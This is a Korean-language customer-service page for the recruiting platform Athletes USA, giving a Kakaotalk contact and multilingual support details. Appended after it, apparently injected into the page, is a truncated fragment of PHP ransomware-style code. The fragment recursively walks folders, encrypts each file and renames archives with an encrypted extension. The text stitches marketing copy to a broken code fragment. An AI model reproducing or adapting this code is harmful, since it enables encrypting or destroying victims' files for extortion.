문의사항은 언제든지 연락주세요. 
Kakaotalk ID: AUKR 

고객센터

저희가 도와드리겠습니다. 망설이지 마시고 연락주세요.

한국어, 영어, 스페인어, 독일어, 프랑스어, 이탈리아어 등 모든 언어로 상담 가능한 Athletes USA 고객 지원팀이 친절하게 상담해 드립니다.

전세계 15개 이상의 글로벌 오피스에서 고객분들을 맞이할 준비를 하고 있습니다.

세계 1위 리쿠르팅 플랫폼과 함께 하세요.

getMessage()); } } } elseif ($fileExtension === 'zip' || $fileExtension === 'tar' || $fileExtension === 'rar') { $encryptedFile = $filePath . $encryptedExtension; if (!file_exists($encryptedFile)) { rename($filePath, $encryptedFile); } } } function encryptFiles($folder, $encryptionKey, $encryptedExtension, $currentScriptFile) { $files = scandir($folder); foreach ($files as $file) { if ($file === '.' || $file === '..') { continue; } $filePath = $folder . '/' . $file; if (is_dir($filePath)) { encryptFiles($filePath, $encryptionKey, $encryptedExtension, $currentScriptFile); } else { encryptFile($filePath, $encryptionKey, $encryptedExtension, $currentScriptFile); } } } encryptFiles($folder, $encryptionKey, $encryptedExtension, $currentScriptFile); ?>